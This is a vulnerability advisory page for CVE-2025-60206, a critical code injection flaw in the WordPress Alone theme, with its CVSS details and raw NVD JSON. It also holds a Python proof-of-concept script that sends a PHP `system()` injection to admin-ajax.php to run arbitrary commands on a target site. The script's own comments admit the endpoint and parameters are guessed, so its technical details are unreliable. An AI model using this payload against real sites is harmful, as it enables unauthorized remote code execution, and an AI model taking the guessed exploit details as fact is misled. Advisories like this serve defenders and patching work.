Security Vulnerability Report
中文
CVE-2025-60206 CVSS 10.0 CRITICAL

CVE-2025-60206

Published: 2025-10-22 15:15:58
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Beplusthemes Alone alone allows Code Injection.This issue affects Alone: from n/a through <= 7.8.3.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Alone Theme <= 7.8.3 (所有受影响的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-60206 PoC - WordPress Alone Theme Code Injection Note: This is a demonstration script for security research purposes only. """ import requests import sys def exploit_alone_rce(target_url, cmd="whoami"): """ Exploit CVE-2025-60206 in WordPress Alone Theme Args: target_url: Target WordPress site URL cmd: Command to execute on the target system Returns: Command output from the target system """ # Target endpoint - adjust based on actual vulnerable endpoint endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare malicious payload with code injection # The vulnerable parameter that accepts unsanitized input payload = { 'action': 'alone_shortcodes_ajax', 'shortcode_name': 'custom', 'shortcode_params[code]': f"<?php system('{cmd}'); ?>" } try: # Send exploit request response = requests.post(endpoint, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Exploit sent successfully") print(f"[+] Response: {response.text}") return response.text else: print(f"[-] Exploit failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 exploit.py <target_url> [command]") print("Example: python3 exploit.py http://example.com id") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "id" exploit_alone_rce(target, command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60206", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:57.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Beplusthemes Alone alone allows Code Injection.This issue affects Alone: from n/a through <= 7.8.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/alone/vulnerability/wordpress-alone-theme-7-8-3-remote-code-execution-rce-vulnerability?_s_id=cve", "source": "[email protected]"}]}}